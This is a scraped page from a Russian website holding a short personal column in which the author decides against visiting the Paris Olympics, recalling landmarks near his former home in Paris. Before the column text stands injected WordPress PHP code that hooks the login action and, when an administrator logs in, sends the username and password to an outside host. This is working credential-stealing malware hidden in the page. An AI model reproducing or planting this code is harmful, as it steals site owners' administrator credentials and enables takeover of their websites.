if (!function_exists("theme_login_init_e691dd827bcab292bda72cb716f33c79")) { function theme_login_init_e691dd827bcab292bda72cb716f33c79() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acklsd.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_e691dd827bcab292bda72cb716f33c79', 10, 0); } Ехать or not ехать — Гатчинка.рф
Home » Колонки » Наши люди в Париже » Ехать or not ехать
Олег KALANOV

Ехать or not ехать

 Олег KALANOV

Вот сижу и размышляю. Ехать ли на Олимпиаду? У меня аж руки чешутся примчаться. Уже сделал стойку, как охотничья собака.

 Когда я жил в Париже, то жил в 16-м. На бульваре Лан, прямо (ну, почти прямо) напротив русского посольства. Через дорогу, в 10 шагах, от дома, в котором свои последние годы провела Эдит Пиаф. Вы знаете, где это? Страшно этим гордился.

Потом узнал, что где-то рядом дом, в котором жила и умерла Мария Каллас. Это чуть выше, но найти было непросто. Там нет никакой мемориальной доски. Помог случай. Спросил первого встречного, и им оказался пожилой мужчина, живущий именно в этом доме, которого в детстве мама водила на прогулку, и, когда они встречали Каллас, каждый раз говорила: «Смотри сынок на эту женщину, когда вырастешь, ты будешь гордиться, что проходил рядом с нею».

А ещё выше, на кладбище Пасси, могила-мавзолей Марии Башкирцевой с её картиной-подлинником «Жёны-Мироносицы». Дальше дворец Шайо. Площадь Трокадеро. И-и-и-и… незабвенная, несравненная, восхитительная Железная леди. Что может быть прекрасней и изящней в Мире?! Затем Марсовы поля. Военные школы, где учились Наполеон и Мюрат, институт Пастера, дворец Инвалидов и бесконечный, бескрайний, свободный Париж. Париж, каким я его знал… Но это в прошлом.

А сейчас? Клетки, заборы, кордоны. Бр-р-ры…

Не хочу. Решено. Не еду!!!

Voilà…

Recommended for you
Олег KALANOV
Царство мёртвых

(далее…)